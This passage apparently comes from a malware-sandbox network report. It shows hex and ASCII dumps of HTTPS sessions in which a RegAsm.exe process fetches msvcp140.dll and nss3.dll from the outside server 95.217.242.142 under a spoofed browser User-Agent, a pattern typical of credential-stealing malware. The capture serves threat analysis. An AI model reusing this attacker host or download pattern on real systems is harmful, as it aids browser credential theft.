2024-04-29 20:13:21 UTC	16384	IN	Data Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
2024-04-29 20:13:21 UTC	16384	IN	Data Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4\|$
2024-04-29 20:13:21 UTC	16384	IN	Data Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4 Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$\|$K$S
2024-04-29 20:13:21 UTC	16384	IN	Data Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
2024-04-29 20:13:21 UTC	16384	IN	Data Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49767	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:22 UTC	222	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Cache-Control: no-cache
2024-04-29 20:13:23 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:22 GMT Content-Type: application/octet-stream Content-Length: 450024 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-6dde8" Accept-Ranges: bytes
2024-04-29 20:13:23 UTC	16138	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-04-29 20:13:23 UTC	16384	IN	Data Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
2024-04-29 20:13:23 UTC	16384	IN	Data Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00 Data Ascii: {\|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
2024-04-29 20:13:23 UTC	16384	IN	Data Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1 Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]ED{I
2024-04-29 20:13:23 UTC	16384	IN	Data Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
2024-04-29 20:13:23 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8 Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
2024-04-29 20:13:23 UTC	16384	IN	Data Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89 Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
2024-04-29 20:13:23 UTC	16384	IN	Data Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c Data Ascii: MS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
2024-04-29 20:13:23 UTC	16384	IN	Data Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 Data Ascii: uF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|iqY(R
2024-04-29 20:13:23 UTC	16384	IN	Data Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49768	95.217.242.142	443	7440	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-29 20:13:25 UTC	218	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0 Host: 95.217.242.142 Cache-Control: no-cache
2024-04-29 20:13:26 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 29 Apr 2024 20:13:25 GMT Content-Type: application/octet-stream Content-Length: 2046288 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-1f3950" Accept-Ranges: bytes
2024-04-29 20:13:26 UTC	16136	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-04-29 20:13:26 UTC	16384	IN	Data Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18 Data Ascii: i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MAQAQ
2024-04-29 20:13:26 UTC	16384	IN	Data Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85 Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-04-29 20:13:26 UTC	16384	IN	Data Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
2024-04-29 20:13:26 UTC	16384	IN	Data Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83 Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
